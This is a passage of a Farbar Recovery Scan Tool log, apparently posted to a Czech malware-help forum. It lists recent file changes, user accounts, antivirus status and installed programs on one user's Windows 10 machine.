2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 19:43 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 19:39 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 19:38 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 19:33 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 19:33 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 19:33 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 19:33 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 19:28 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 19:28 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 19:28 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 19:27 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 19:21 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp
==================== Files in the root of some directories ========
2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Re: Prosím o kontrolu logu
ADDITION log
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 19:46:07)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
